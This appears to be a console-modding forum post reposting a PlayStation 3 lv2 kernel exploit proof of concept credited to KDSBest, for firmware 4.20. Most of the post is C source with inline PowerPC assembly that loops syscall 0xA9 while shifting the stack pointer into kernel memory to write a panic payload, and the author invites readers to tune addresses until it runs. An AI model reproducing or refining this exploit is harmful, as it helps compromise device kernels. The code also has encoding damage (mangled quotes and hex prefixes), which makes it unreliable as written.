Jump to content
RealModScene
Sign in to follow this  
igor242

Another lv2 Exploit – This Time From KDSBest

Recommended Posts

Another lv2 Exploit has been published, this time from german dev KDSBest. He claims he did not get it to work on firmware 4.21, so he did it on 4.20. If you don’t know what lv2 is, you can read it up on the ps3devwiki.

Since @naehrwert posted an lv2 exploit I will do so too . The stack pointer points to lv2 and if we do a syscall, the syscall saves register to the stack HAHA. Btw. It just crashes the console for now, since I totaly overwrite dump the lv2 or some memory addresses I don’t know. Feel free to try around, adjust the address of the stackpointer and so on. If you managed to get the panic payload executed. Tell me!!! ^^

//compile: ppu-gcc kds2.c -o kds2.elf

//or: ppu-lv2-gcc kds2.c -o kds2.elf

register unsigned long long payloadHolder2 asm (“r21″);

register unsigned long long payloadHolder asm (“r20″);

register unsigned long long stackpointer asm (“r1″);

register unsigned long long counter asm (“r25″);

register unsigned long long bufferStackpointer asm (“r26″);

int __volatile__ main(int argc, const char* argv[])

{

// backup Stack pointer

bufferStackpointer = stackpointer;

payloadHolder = 0x3960024F3960024FUL;

payloadHolder2 = 0x4400000244000002UL;

// Incrementer

counter = 0×00;

// Play with that address till the panic is executed, I lack of time todo so

// add always 2 or 4 to it, i would try 4 or 8… bla bla you will get the idea

stackpointer = 0x8000000000000100UL;

doItAgain:

// KDSBest Payload

// Prepare for our Syscall

asm(“li %r0, 0×0″);

asm(“li %r3, 0×6″);

asm(“li %r4, 0×1″);

// li r11, 0x24F -> PANIC

asm(“mr %r22, %r20″);

asm(“mr %r23, %r20″);

asm(“mr %r24, %r20″);

asm(“mr %r27, %r20″);

asm(“mr %r28, %r20″);

asm(“mr %r29, %r20″);

asm(“mr %r30, %r20″);

asm(“mr %r31, %r20″);

// Stack Pointer = Build Address of LV2

stackpointer += counter;

// Syscall 0xA9

asm(“li %r11, 0xA9″);

asm(“scâ€);

counter += 0×04;

// We write sc

asm(“mr %r22, %r21″);

asm(“mr %r23, %r21″);

asm(“mr %r24, %r21″);

asm(“mr %r27, %r21″);

asm(“mr %r28, %r21″);

asm(“mr %r29, %r21″);

asm(“mr %r30, %r21″);

asm(“mr %r31, %r21″);

// Stack Pointer = Build Address of LV2

stackpointer += counter;

// Syscall 0xA9

asm(“li %r11, 0xA9″);

asm(“scâ€);

counter += 0×04;

if(counter < 0×1000000)

goto doItAgain;

stackpointer = bufferStackpointer;

return 0;

}

I didn’t managed to make it work on 4.21 so I just did on 4.20

Source(PS3HAX)

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...
Sign in to follow this  

×
×
  • Create New...